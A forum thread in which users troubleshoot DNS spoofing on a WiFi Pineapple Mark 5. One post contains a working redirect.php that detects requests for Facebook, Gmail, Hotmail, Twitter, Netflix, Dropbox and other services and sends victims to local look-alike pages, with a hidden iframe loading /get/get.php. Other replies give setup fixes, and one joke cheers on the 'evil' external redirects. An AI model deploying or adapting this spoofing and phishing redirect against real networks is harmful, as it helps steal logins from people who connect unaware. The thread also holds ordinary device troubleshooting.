Jump to content

Pineapple Mark 5 dns spoof does not work


SystemCrash86
 Share

Recommended Posts

It should work!

Its just the default index.php file (that your most likely hitting) is issuing a redirect to /redirect.php on the spoofed website.

so www.example.com becomes www.example.com/redirect.php

replace your /www/index.php with something static that you can easily identify; like pineapple_surprise ?

Link to comment
Share on other sites

<?php
	$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

	if (strpos($ref, "hotmail")){
	      header('Status: 302 Found');
		header('Location: hotmail.htm');
	}
       if (strpos($ref, "facebook")){
	      header('Status: 302 Found');
		header('Location: facebook.htm');
	}
       if (strpos($ref, "twitter")){
	      header('Status: 302 Found');
		header('Location: twitter.htm');
	}
       if (strpos($ref, "gmail")){
	      header('Status: 302 Found');
		header('Location: gmail.htm');
	}
       if (strpos($ref, "youtube")){
	      header('Status: 302 Found');
		header('Location: youtube.htm');
	}
         if (strpos($ref, "vimeo")){
	        header('Status: 302 Found');
		header('Location: vimeo.htm');
	}
         if (strpos($ref, "linkedin")){
	        header('Status: 302 Found');
		header('Location: linkedin.htm');
	}
         if (strpos($ref, "instagram")){
	        header('Status: 302 Found');
		header('Location: instagram.html');
	}
         if (strpos($ref, "plus.google")){
	        header('Status: 302 Found');
		header('Location: googleplus.htm');
	}
          if (strpos($ref, "netflix")){
	         header('Status: 302 Found');
		header('Location: netflix.htm');

        }
         if (strpos($ref, "ustream")){
	        header('Status: 302 Found');
		header('Location: ustream.htm');

        }
         if (strpos($ref, "dropbox")){
	        header('Status: 302 Found');
		header('Location: dropbox.htm');

        }

          if (strpos($ref, "blogger")){
	         header('Status: 302 Found');
		header('Location: blogger.htm');
        }
         if (strpos($ref, "outlook")){
	        header('Status: 302 Found');
		header('Location: outlook.htm');

        }

	require('error.php');

?>
<iframe style="display:none;" src="/get/get.php"></iframe>

This is my redirect.php - the only thing i changed, the error.php and the index.php remain untouched. It worked for my mark 4 so i assumed it would work for my mark 5 - was that an error on my part?

Link to comment
Share on other sites

DNS Spoofing does work on the Mark 5. There are a few things you'll need to know though.

The Configuration Tile: DNS Spoof Tab has a bug in it. If you use that Tab to edit the Hosts or the index.php you files will end up with extra characters that look like this ^M. There will be one after each line. If you SSH in and delete those out it will start working.

The dnsspoof infusion does not add the extra characters but it does not support editing the index.php. Again, just SSH in.

Link to comment
Share on other sites

I had a look at the Configuration Tile and DNS Spoof Tab and the Hosts or index.php have no extra characters at all - not even the ^M and the same thing in the dnsspoof infusion and all i changed was my redirect.php thats it thats all i changed and when i start dns spoof - either from the configuration tile or the actual dns spoof tile i get no errors at all. On my other pc i browse to the spoofed site e.g facebook, twitter and the actual site loads.

I haven't seen any extra characters

Link to comment
Share on other sites

SystemCrash86,

How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.

barry99705,

I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

Link to comment
Share on other sites

SystemCrash86,

How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.

barry99705,

I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

I SSH'd into the pineapple and went to the www folder and checked the index.php file and other files in that folder and still nothing - did i miss something?

Link to comment
Share on other sites

Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file?

After i couldn't find anything in the www folder i looked at the /etc/pineapple/spoofhost file and found nothing except the hosts i want to dnsspoof, no extra characters or anything.

I'm very confused

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...